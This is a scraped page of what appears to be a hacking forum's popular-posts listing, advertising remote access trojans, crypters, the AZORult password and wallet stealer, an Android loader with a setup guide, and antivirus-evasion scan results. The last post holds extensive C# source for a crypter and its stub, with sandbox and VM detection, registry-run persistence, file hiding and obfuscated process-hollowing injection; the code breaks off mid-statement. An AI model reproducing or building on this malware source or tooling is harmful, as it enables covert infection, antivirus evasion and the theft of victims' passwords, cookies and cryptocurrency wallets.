Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

 

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware,, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      Leaderboard


      Popular Content

      Showing content with the highest reputation on 03/06/2019 in all areas

      1. 2 points
        Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      2. 2 points
        Website: [Hidden Content] Download: [Hidden Content] Password: level23hacktools.com
      3. 2 points
        😛 AutoIT [HIDE][Hidden Content]] Pass: level23hacktools.com [Hidden Content]
      4. 1 point
        Saefko Attack Systems the most advance RAT-BOT-AGENT ever created This is "a multi protocol multi operating system" remote administration tool , This is the first system to use three protocols establishing all time communication , there is four main thing this design provides that no other system provide first Unlimited number of machines to control. Extreme reliability. Android and Windows control at the same time. No port forwarding. No mysql. This project was designed to replace all RAT/BOTS that are made to control remote machine,the problem with all current RATS/BOTS that they are unreliable and limited , you cant in 99.9% of the time have more than 100 machine or victim due to self flooding , self flooding meaning when the client connect to the server directly "when the rat connect to the attacker pc through TCP" . When the number of connected clients increased this acte as flood attack, so you will be limited to some low number and you will end up with lagy unreliable connection to the target machines. That's from the side of TCP rats the other side is the http bots ,that use a remote server containing some php scripts and mysql server , this design can handle unlimited number of machines in theory , but the problem with this design is that you do not have a direct connection to the machine so you are limited to http tasks and this dose not give you much control so that was just a quick short overview on some of extreme problems that RATS/BOTS facing with current techs,in Saefko Attack Systems "SAS" you combining both of these types of connections and adding IRC Protocol to the mix you will end up with extremely reliable connection to the target machine,SAS will handle millions of connections with direct TCP communications established through IRC networks any time any place all wither. Fast Setup Youtube : Main Windows Public HTTP Tasks Windows Build Android Build Command And Control Sections Android Command And Control Sections Android IRC Commands ANDROID COMMANDS [msg] Show toast message. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [ping] Ping the agent machine to check if still active. [location] Get geo location information based on 'ipinfo.com'. [flashon] Turn the dvice flash on. [flashoff] Turn the dvice flash on. [wakeup] Turn dvice screen on. [screenshot] Take a screenshot to from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Android TCP Commands Android Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Now Windows Command And Control Windows IRC Commands WINDOWS COMMANDS [pwd] Show current directory. [screenshot] Take a screenshot to from the target machine. [opencd] Open cd rom. [closecd] Close cd rom. [ping] Ping the agent machine to check if still active. [camlist] Get a list of available camera devices. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [location] Get geo location information based on 'ipinfo.com'. [opencd] Open cd rom. [keylogs] Get agent saved keylogs through HTTP drop point. [shell] Run shell commands. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [uninstall] Uninstall the agent completely from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Windows TCP Commands Windows Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Download: [Hidden Content]
      5. 1 point
        [Hidden Content] Anti-Virus Signature Date Detection AdAware 29.01.2019 Clean Arcabit 29.01.2019 Clean Avast 29.01.2019 Clean AVG 29.01.2019 Clean Avira 29.01.2019 Clean Bitdefender 29.01.2019 Clean Bullguard 29.01.2019 Clean ClamAV 29.01.2019 Clean Comodo 29.01.2019 Clean Cyren 29.01.2019 Clean Defender 29.01.2019 Clean eScan 29.01.2019 Clean Eset 29.01.2019 Clean FProt 29.01.2019 Clean FSecure 29.01.2019 Clean GData 29.01.2019 Clean Ikarus 29.01.2019 Clean Immunet 29.01.2019 Clean Kaspersky 29.01.2019 not-a-virus:HEUR:AdWare.Win32.Generic Sophos 29.01.2019 Clean Trustport 29.01.2019 Clean xVirus 29.01.2019 Clean Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      6. 1 point
        > sportp2p.com/live-stream/ lshunter.net/live/ mytvfree.me tvfree.me aovivoagora.com aovivoagora.online assia.tv assistirtvbr.tv assistirtvonline.tv atdhe.eu atdhe.mx atdhes.eu atdhe.me atdhe.cc More sites will be added later Download: [Hidden Content] Virus Scan: [Hidden Content]
      7. 1 point
        Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      8. 1 point
      9. 1 point
        Automated pentest framework for offensive security experts [HIDE][Hidden Content]] Sn1per v6.1 – New Features & Fixes Added automated web scanning via Burpsuite Pro 2.x API for all ‘web’ mode scans Added Waybackmachine URL retrieval to all web scans Converted all exploits to Metasploit Added configuration options to set LHOST/LPORT for all Metasploit exploits in sniper.conf Added improved web brute force dictionaries for all modes Added individual logging for all tools under the loot directory Added new sniper.conf options to enabled/disable all plugins and change settings per user Fixed issue with CMSMap install/usage Fixed issue with WPScan gem dependency missing (public_suffix) Fixed timeout setting in cutycapt Fixed issue with theharvester not running correctly Fixed issue with Amass not running due to invalid command line options in latest release Fixed issue with Sn1per Professional notepad.html missing Cleaned up plugins and install dependencies list
      10. 1 point
        [HIDE][Hidden Content]] Pass: level23hacktools.com
      11. 1 point
        Solo funciona con mail.ru [HIDE][Hidden Content]] Pass:PM me! Server.exe Scan: [Hidden Content]
      12. 1 point
        [HIDE][Hidden Content]] Pass: level23hacktools.com
      13. 1 point
        THC-Hydra is a very fast (multi-threaded) network logon cracker which supports many different services: AFP, Cisco, cisco-enable, CVS, Firebird, ftp, http-get, http-head, http-proxy, https-get, https-head, https-form-get, https-form-post, ICQ, IMAP, IMAP-NTLM, ldap2, ldap3, MySQL, mysql, NCP, nntp, oracle-listener, PCAnywhere, pcnfs, pop3, pop3-NTLM, Postgres, rexec, rlogin, rsh, sapr3, sip, smb, smbnt, SMTP-auth, SMTP-auth-NTLM, SNMP, socks5, ssh2, svn, TeamSpeak, telnet, vmauthd, vnc. THIS TOOL IS FOR LEGAL PURPOSES ONLY! Changelog 8.8 * New web page: [Hidden Content] * added PROBLEMS file with known issues * rdp: disabled the module as it does not support the current protocol. If you want to add it contact me * ldap: fixed a dumb strlen on a potential null pointer * http-get/http-post: – now supports H=/h= parameters same as http-form (thanks to mathewmarcus@github for the patch) – 403/404 errors are now always registered as failed attempts * mysql module: a non-default port was not working, fixed * added -w timeout support to ssh module * fixed various memory leaks in http-form module * corrected hydra return code to be 0 on success * added patch from debian maintainers which fixes spellings * fixed weird crash on x64 systems * many warning fixes by crondaemon [Hidden Content]
      14. 1 point
      15. 1 point
        Crypter Morpheous File Name : morpheous.exe File Size : 351.50 KB Date Scanned : 2018-12-12 11:09:03 MD5 : b973c319b6cd6549b8a39d6de7d3c51f Detection : 16 / 22 [Hidden Content] ____________________________ Crypter 404 File Information File Name : aaaaaaa.exe File Size : 264.00 KB Date Scanned : 2018-12-12 11:04:30 MD5 : 2b3ec58d7434b57ca16d8ca8e9b788d0 Detection : 14 / 22 [Hidden Content]
      16. 1 point
        android loader installation guide 20/11/17 Server requirements: - OS debian 7.0 or newer - RAM 2 Gb or more - apache 2 - php 5 - mysql 1. bot Open folder 'bot' in Android studio 2.0 or higher Set correct server ip or domain in bot/app/src/main/java/task/loader/Constants.java Build apk 2. panel Upload panel to the server Setup apache with panel/apache_loader.conf Create mysql database named 'loader' and import panel/db_loader.sql Set mysql access data in panel/db.php Copy panel/video/aapt/libc++.so to /usr/lib/ Setup basic auth in panel/video/.htaccess: htpasswd -cb /var/data/loader.passwd USER PASSWORD make panel/tmp writeable 3. usage - install loader on the phone - open panel with default login 'admin' and password '123123' - bot should appear in 'Bots' section - upload target apk (that should be installed by loader) to any host - create new task in Loader panel, set direct url to apk - set number of attemps - how much times loader will propose user to install the target apk - make task 'active' - make sure loader is installed on your device, disable screen - enable screen again - loader will propose you to install the target apk - it will propose user to install every 20 seconds once it will be done Optionally you can show landing page first, set url of the landing in the task settings Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      17. 1 point
      18. 1 point
        Invalid key, pls someone share the activation key here on comment..
      19. 1 point
        Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      20. 1 point
        AZORult – Passwords, cookies, bitcoin, desktop files, etc stealer Multifunctional Styler. Functional: -Password Stealer Google Chrome Google Chrome x64 YandexBrowser Opera Mozilla Firefox InternetMailRu ComodoDragon Amigo Bromium Chromium Outlook Thunderbird Filezilla Pidgin PSI PSI Plus -Cookies stealer Google Chrome Google Chrome x64 YandexBrowser Opera Mozilla Firefox InternetMailRu ComodoDragon Amigo Bromium Chromium • Bitcoin clients files Collects files of wallet.dat popular bitcoins of clients (bitcoin, litecoin, etc) • Skype message history. Grabs a file with a correspondence database. The file is read by special utilities. • Desktop files grabber. Gets the files of the specified extensions from the desktop. Filter by file size. It also recursively searches for files in subfolders. • List of installed programs. • List of running processes. • Username, compname, OS, RAM The Download : [HIDE-THANKS]DOWNLOAD[/HIDE-THANKS] Password : [HIDE-THANKS]level23[/HIDE-THANKS]
      21. 1 point
        [ATTACH=JSON]{"data-align":"none","data-size":"full","title":"android-hacking-tool-download.png","data-attachmentid":110820}[/ATTACH] Download: [HIDE-THANKS][Hidden Content]] Password: level23hacktools.com
      22. 1 point
        [HIDE-THANKS] >using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Diagnostics; using Microsoft.Win32; using System.Threading; namespace WindowsFormsApplication1 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void button2_Click(object sender, EventArgs e) { OpenFileDialog d = new OpenFileDialog(); if (d.ShowDialog() == DialogResult.OK) txtLinkToFile.Text = d.FileName; } private void button1_Click(object sender, EventArgs e) { System.Resources.ResourceWriter w = new System.Resources.ResourceWriter("res.resources"); w.AddResource("file", RC4EncryptDecrypt(System.IO.File.ReadAllBytes(txtLinkToFile.Text), "nitin890")); w.Close(); System.CodeDom.Compiler.CompilerParameters p = new System.CodeDom.Compiler.CompilerParameters(); p.GenerateExecutable = true; p.OutputAssembly = "Crypted.exe"; p.ReferencedAssemblies.Add("System.dll"); p.EmbeddedResources.Add("res.resources"); p.CompilerOptions += "/t:winexe"; System.CodeDom.Compiler.CompilerResults r = new Microsoft.CSharp.CSharpCodeProvider().CompileAssemblyFromSource(p, Properties.Resources.Source); System.IO.File.Delete("res.resources"); foreach (System.CodeDom.Compiler.CompilerError err in r.Errors) MessageBox.Show(err.ToString()); MessageBox.Show("Crypted! Saved as Crypted.exe!", "Complete!", MessageBoxButtons.OK, MessageBoxIcon.Information); } public byte[] RC4EncryptDecrypt(byte[] bytes, string Key) { byte[] key = System.Text.Encoding.ASCII.GetBytes(Key); byte[] s = new byte[256]; byte[] k = new byte[256]; byte temp; int i, j; for (i = 0; i { s[i] = (byte)i; k[i] = key[i % key.GetLength(0)]; } j = 0; for (i = 0; i { j = (j + s[i] + k[i]) % 256; temp = s[i]; s[i] = s[j]; s[j] = temp; } i = j = 0; for (int x = 0; x { i = (i + 1) % 256; j = (j + s[i]) % 256; temp = s[i]; s[i] = s[j]; s[j] = temp; int t = (s[i] + s[j]) % 256; bytes[x] ^= s[t]; } return bytes; } private void txtLinkToFile_TextChanged(object sender, EventArgs e) { } } } >using System; using System.Collections.Generic; using System.Data; using System.Drawing; using System.Diagnostics; using System.Text; using System.Windows.Forms; using System.IO; using System.Runtime.InteropServices; using System.Resources; using System.Security.Cryptography; using System.Reflection; using Microsoft.Win32; using System.Security.Principal; using System.Net; using System.Management; [assembly: AssemblyTitle("[assemblytitle]")] [assembly: AssemblyDescription("[assemblyinfo]")] [assembly: AssemblyCompany("[assemblycorp]")] [assembly: AssemblyProduct("[assemblyproduct]")] [assembly: AssemblyCopyright("[assemblycopyright]")] [assembly: AssemblyTrademark("[assemblytrademark]")] [assembly: AssemblyVersionAttribute("[assemblyversion]")] [assembly: AssemblyFileVersionAttribute("[assemblyfileversion]")] static class Program { [sTAThread] static void Main() { Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); Application.Run(new PG()); } } class RX { [DllImport("kernel32.dll")] static extern IntPtr GetModuleHandle(string module); [DllImport( "kernel32.dll", SetLastError=true )] static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType); [DllImport("kernel32.dll", SetLastError=true)] static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo); [DllImport("kernel32.dll", SetLastError=true)] static extern uint SizeofResource(IntPtr hModule, IntPtr hResInfo); public static byte[] RM() { ResourceManager Manager = new ResourceManager("Encrypted", Assembly.Load(File.ReadAllBytes(Application.ExecutablePath))); byte[] bytes = (byte[])Manager.GetObject("encfile"); return bytes; } } public partial class PG : Form { static bool waited = false; private void InitializeComponent() { this.SuspendLayout(); this.FormBorderStyle = FormBorderStyle.None; this.ShowInTaskbar = false; this.ResumeLayout(false); this.Visible = false; this.WindowState = FormWindowState.Minimized; bool dBool = false; if(dBool){ System.Timers.Timer dTimer = new System.Timers.Timer(); dTimer.Interval = (1000) * (1); dTimer.Elapsed += delayTimer_Elapsed; dTimer.Enabled = true; dTimer.Start(); while(!waited){} } bool pBool = false; if(pBool){ this.FormClosing += Closing; } } void delayTimer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { waited = true; } void Closing(object sender, FormClosingEventArgs e) { Process.Start(Application.ExecutablePath); } public PG() { InitializeComponent(); string injectionType = "[injectionType]"; string injectionPath = ""; switch(injectionType.ToLower()){ case "notepad.exe": injectionPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe");//@"C:\Windows\System32\notepad.exe"; break; case "vbc.exe": injectionPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe"); break; case "default browser": injectionPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe");//BrowserPath(); break; default: injectionPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe"); break; } bool adminonly = [adminonly]; bool msgbox = [msgbox]; bool startup = [startup-replace]; bool hide = [hide-replace]{!.estebbc:{"post_id":28763,"user_id":1}}; string storagemethod = "[storage-replace]"; bool downloader = [downloader-replace]; bool detectVM = [detectVM]; bool detectSandboxie = [detectSandboxie]; if(detectVM) { if(IsVM()) { MessageBox.Show("This process does not support VMs!", "Error!", MessageBoxButtons.OK, MessageBoxIcon.Error); Process.GetCurrentProcess().Kill(); } } if(detectSandboxie) { if(IsSandbox(Application.ExecutablePath)) { MessageBox.Show("This process does not support Sandboxes!", "Error!", MessageBoxButtons.OK, MessageBoxIcon.Error); Process.GetCurrentProcess().Kill(); } } if(adminonly){ if(!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)){ ProcessStartInfo pInfo = new ProcessStartInfo(); pInfo.FileName = Application.ExecutablePath; pInfo.Verb = "runas"; Process.Start(pInfo); Process.GetCurrentProcess().Kill(); } } if(downloader) { string url = "[downloaderurl]"; /*WebClient webClient = new WebClient(); webClient.DownloadFile(new Uri(url), "dl" + System.AppDomain.CurrentDomain.FriendlyName); System.IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "dl" + System.AppDomain.CurrentDomain.FriendlyName); System.IO.File.Move("dl" + System.AppDomain.CurrentDomain.FriendlyName, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "dl" + System.AppDomain.CurrentDomain.FriendlyName); FileInfo Info = new FileInfo(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "dl" + System.AppDomain.CurrentDomain.FriendlyName); Info.Attributes = FileAttributes.Hidden; System.Diagnostics.Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "dl" + System.AppDomain.CurrentDomain.FriendlyName);*/ } if(msgbox){ MessageBoxIcon icon; switch("[msgboxicon]"){ case "info": icon = MessageBoxIcon.Information; break; case "error": icon = MessageBoxIcon.Error; break; case "warning": icon = MessageBoxIcon.Warning; break; case "none": icon = MessageBoxIcon.None; break; default: icon = MessageBoxIcon.None; break; } MessageBox.Show("[msgboxbody]", "[msgboxtitle]", MessageBoxButtons.OK, icon); } byte[] filebytes = null; filebytes = RX.RM(); filebytes = AESDecrypt(filebytes, "[key-replace]"); IX.AA(filebytes, injectionPath); string installpath = "[installpath]"; if(installpath == "%appdata%"){ installpath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + System.AppDomain.CurrentDomain.FriendlyName; } if(installpath == "%tmp%"){ installpath = Path.GetTempPath() + System.AppDomain.CurrentDomain.FriendlyName; } if (!File.Exists(installpath)) { File.Copy(Application.ExecutablePath, installpath); } if (startup) AddToStartup(installpath); if (hide) HideFile(); } public static bool IsSandbox(string startupPath) { StringBuilder username = new StringBuilder(); Int32 nSize = 50; GetUserName(username, ref nSize); if ((int)GetModuleHandle("SbieDLL.dll") != 0) return true; switch (username.ToString().ToUpper()) { case "USER": return true; case "SANDBOX": return true; case "VIRUS": return true; case "MALWARE": return true; case "SCHMIDTI": return true; case "CURRENTUSER": return true; } string sPath = startupPath.ToUpper(); if (sPath == "C:\\FILE.EXE") return true; if (sPath.Contains("\\VIRUS")) return true; if (sPath.Contains("SANDBOX")) return true; if (sPath.Contains("SAMPLE")) return true; if ((int)FindWindow("Afx:400000:0", (IntPtr)0) != 0) return true; return false; } [DllImport("advapi32.dll", SetLastError = true)] public static extern bool GetUserName(StringBuilder sb, ref Int32 length); [DllImport("kernel32.dll")] public static extern IntPtr GetModuleHandle(string lpModuleName); [DllImport("user32.dll", SetLastError = true)] static extern IntPtr FindWindow(string lpClassName, IntPtr ZeroOnly); [DllImport("kernel32.dll")] extern public static IntPtr GetProcAddress(IntPtr hModule, string procedureName); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern uint GetFileAttributes(string lpFileName); public static bool IsVM() { if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VBOX")) { return true; } if (regGet("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("VBOX")) { return true; } if (regGet("HARDWARE\\Description\\System", "VideoBiosVersion").ToUpper().Contains("VIRTUALBOX")) { return true; } if (regGet("SOFTWARE\\Oracle\\VirtualBox Guest Additions", "") == "noValueButYesKey") { return true; } if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\VBoxMouse.sys") != (uint)4294967295) { return true; } if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; } if (regGet("SOFTWARE\\VMware, Inc.\\VMware Tools", "") == "noValueButYesKey") { return true; } if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; } if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; } if (regGet("SYSTEM\\ControlSet001\\Services\\Disk\\Enum", "0").ToUpper().Contains("vmware".ToUpper())) { return true; } if (regGet("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", "DriverDesc").ToUpper().Contains("VMWARE")) { return true; } if (regGet("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\Settings", "Device Description").ToUpper().Contains("VMWARE")) { return true; } if (regGet("SOFTWARE\\VMware, Inc.\\VMware Tools", "InstallPath").ToUpper().Contains("C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\")) { return true; } if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\vmmouse.sys") != (uint)4294967295) { return true; } if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\vmhgfs.sys") != (uint)4294967295) { return true; } // Detected whine if (GetProcAddress((IntPtr)GetModuleHandle("kernel32.dll"), "wine_get_unix_file_name") != (IntPtr)0) { return true; } if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("QEMU")) { return true; } if (regGet("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("QEMU")) { return true; } ManagementScope scope = new ManagementScope("\\\\.\\ROOT\\cimv2"); ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_VideoController"); ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query); ManagementObjectCollection queryCollection = searcher.Get(); foreach (ManagementObject m in queryCollection) { if (m["Description"].ToString() == "VM Additions S3 Trio32/64") { return true; } if (m["Description"].ToString() == "S3 Trio32/64") { return true; } if (m["Description"].ToString() == "VirtualBox Graphics Adapter") { return true; } if (m["Description"].ToString() == "VMware SVGA II") {return true; } if (m["Description"].ToString().ToUpper().Contains("VMWARE")) {return true; } if (m["Description"].ToString() == "") { return true; } } return false; } public static string regGet(string key, string value) { RegistryKey registryKey; registryKey = Registry.LocalMachine.OpenSubKey(key, false); if (registryKey != null) { object rkey = registryKey.GetValue(value, (object)(string)"noValueButYesKey"); if (rkey.GetType() == typeof(string)) { return rkey.ToString(); } if (registryKey.GetValueKind(value) == RegistryValueKind.String || registryKey.GetValueKind(value) == RegistryValueKind.ExpandString) { return rkey.ToString(); } if (registryKey.GetValueKind(value) == RegistryValueKind.DWord) { return Convert.ToString((Int32)rkey); } if (registryKey.GetValueKind(value) == RegistryValueKind.QWord) { return Convert.ToString((Int64)rkey); } if (registryKey.GetValueKind(value) == RegistryValueKind.Binary) { return Convert.ToString((byte[])rkey); } if (registryKey.GetValueKind(value) == RegistryValueKind.MultiString) { return string.Join("", (string[])rkey); } return "noValueButYesKey"; } return "noKey"; } public static byte[] AESDecrypt(byte[] input, string Pass) { System.Security.Cryptography.RijndaelManaged AES = new System.Security.Cryptography.RijndaelManaged(); byte[] hash = new byte[32]; byte[] temp = new MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.ASCII.GetBytes(Pass)); Array.Copy(temp, 0, hash, 0, 16); Array.Copy(temp, 0, hash, 15, 16); AES.Key = hash; AES.Mode = System.Security.Cryptography.CipherMode.ECB; System.Security.Cryptography.ICryptoTransform DESDecrypter = AES.CreateDecryptor(); return DESDecrypter.TransformFinalBlock(input, 0, input.Length); } public void AddToStartup(string installpath_) { if (installpath_ == null || installpath_ == "") { installpath_ = Path.GetTempPath() + System.AppDomain.CurrentDomain.FriendlyName; } RegistryKey Key = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true); Key.SetValue("[startup-name]", installpath_); } public void HideFile() { FileInfo Info = new FileInfo(Application.ExecutablePath); Info.Attributes = FileAttributes.Hidden; } } public class IX { [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] internal static extern IntPtr LoadLibraryA([in, MarshalAs(UnmanagedType.LPStr)] string lpFileName); [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] static extern IntPtr GetProcAddress(IntPtr hModule, string procName); delegate bool ESS(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo); delegate bool EXT(IntPtr hThr, uint[] ctxt); delegate bool TEX(IntPtr t, uint[] c); //all kernel32 delegate uint ION(IntPtr hProc, IntPtr baseAddr); //ntdll delegate bool ORY(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead); delegate uint EAD(IntPtr hThread); //kernel32.dll delegate IntPtr CEX(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot); delegate bool CTEX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect); delegate bool MOR(IntPtr hProcess, IntPtr naddr, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); //kernel32.dll delegate bool OP(byte[] bytes, string surrogateProcess); public T CreateAPI(string name, string method) { return (T)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), typeof(T)); } public static bool AA(byte[] bytes, string surrogateProcess) { IX p = new IX(); OP F1 = new OP(p.Q); bool Res = F1(bytes, surrogateProcess); return true; } public bool Q(byte[] bytes, string surrogateProcess) { String NTD = Convert.ToString((char)110) + (char)116 + (char)100 + (char)108 + (char)108; ESS CP = CreateAPI("kernel32", Convert.ToString((char)67) + (char)114 + (char)101 + (char)97 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)65); ION NUVS = CreateAPI(NTD, Convert.ToString((char)78) + (char)116 + (char)85 + (char)110 + (char)109 + (char)97 + (char)112 + (char)86 + (char)105 + (char)101 + (char)119 + (char)79 + (char)102 + (char)83 + (char)101 + (char)99 + (char)116 + (char)105 + (char)111 + (char)110); EXT GTC = CreateAPI("kernel32", Convert.ToString((char)71) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116); TEX STC = CreateAPI("kernel32", Convert.ToString((char)83) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116); ORY RPM = CreateAPI("kernel32", Convert.ToString((char)82) + (char)101 + (char)97 + (char)100 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121); EAD RT = CreateAPI("kernel32", Convert.ToString((char)82) + (char)101 + (char)115 + (char)117 + (char)109 + (char)101 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100); CEX VAE = CreateAPI("kernel32", Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)65 + (char)108 + (char)108 + (char)111 + (char)99 + (char)69 + (char)120); CTEX VPE = CreateAPI("kernel32", Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)80 + (char)114 + (char)111 + (char)116 + (char)101 + (char)99 + (char)116 + (char)69 + (char)120); MOR WPM = CreateAPI("kernel32", Convert.ToString((char)87) + (char)114 + (char)105 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121); try { IntPtr procAttr = IntPtr.Zero; IntPtr[] processInfo = new IntPtr[4]; byte[] startupInfo = new byte[0x44]; int num2 = BitConverter.ToInt32(bytes, 60); int num = BitConverter.ToInt16(bytes, num2 + 6); IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54)); if (CP(null, new StringBuilder(surrogateProcess), procAttr, procAttr, false, 4, procAttr, null, startupInfo, processInfo)) { uint[] ctxt = new uint[0xb3]; ctxt[0] = 0x10002; if (GTC(processInfo[1], ctxt)) { IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L); IntPtr buffer = IntPtr.Zero; IntPtr bufferSize = new IntPtr(4); IntPtr numRead = IntPtr.Zero; if (RPM(processInfo[0], baseAddr, ref buffer, (int)bufferSize, ref numRead) && (NUVS(processInfo[0], buffer) == 0)) { IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34)); IntPtr sz = new IntPtr((Int32)BitConverter.ToUInt32(bytes, num2+80)); IntPtr naddr = VAE(processInfo[0], addr, sz, 0x3000, 0x40); int lpNumberOfBytesWritten; WPM(processInfo[0], naddr, bytes, (uint)((int)ptr4), out 